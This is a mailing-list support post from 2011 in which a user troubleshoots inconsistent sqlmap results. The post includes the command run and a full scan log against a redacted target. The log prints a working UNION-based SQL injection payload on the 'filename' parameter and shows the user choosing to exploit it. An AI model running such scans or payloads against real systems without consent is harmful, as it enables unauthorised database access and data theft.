Re: [sqlmap-users] MySQL Union technique gives out inconsistent results
From: Joahnna M. D. <dam...@ya...> - 2011-07-12 13:39:42
Note: I just updated my sqlmap version. I'm now running the r4258.

--- On Tue, 7/12/11, Joahnna Marie Damiao <dam...@ya...> wrote:

From: Joahnna Marie Damiao <dam...@ya...>
Subject: [sqlmap-users] MySQL Union technique gives out inconsistent results
To: sql...@li...
Date: Tuesday, July 12, 2011, 3:32 PM

Hi,

Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable.

What seems to be the problem here? Anybody can help me?

C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --batch --beep

sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool
http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:39:37

[14:39:37] [INFO] setting file for logging HTTP traffic
[14:39:37] [INFO] testing connection to the target url
[14:39:38] [INFO] searching for forms
[#1] form: [INFO] GET xxxxxxxxx
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: xxxxxxxx
do you want to fill blank fields with random values? [Y/n] Y
[14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as session file
[14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' as results file
[14:39:38] [INFO] testing if the url is stable, wait a few seconds
[14:39:39] [INFO] url is stable
[14:39:39] [INFO] testing if GET parameter 'productid' is dynamic
[14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic
[14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might not be injectable
[14:39:39] [INFO] testing sql injection on GET parameter 'productid'
[14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:39:41] [INFO] testing 'Oracle AND time-based blind'
[14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:39:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. you can try to explicitly set it using the --dbms option
[14:39:44] [WARNING] GET parameter 'productid' is not injectable
[14:39:44] [INFO] testing if GET parameter 'name' is dynamic
[14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic
[14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable
[14:39:44] [INFO] testing sql injection on GET parameter 'name'
[14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:39:46] [INFO] testing 'Oracle AND time-based blind'
[14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:51] [WARNING] GET parameter 'name' is not injectable
[14:39:51] [INFO] testing if GET parameter 'filename' is dynamic
[14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic
[14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might not be injectable
[14:39:52] [INFO] testing sql injection on GET parameter 'filename'
[14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
[14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:39:56] [INFO] testing 'Oracle AND time-based blind'
[14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:09] [CRITICAL] unable to connect to the target url or proxy
[14:40:09] [INFO] target url appears to be UNION injectable with 10 columns
[14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:13] [CRITICAL] unable to connect to the target url or proxy
[14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'filename' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 414 HTTP(s) requests:
---
Place: GET
Parameter: filename
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 to 10 columns
    Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsDiekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&creationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isactive=on&comment=uPni
---
do you want to exploit this SQL injection? [Y/n] Y
[14:40:13] [INFO] testing MySQL
[14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form
[14:40:16] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv'

[*] shutting down at 14:40:16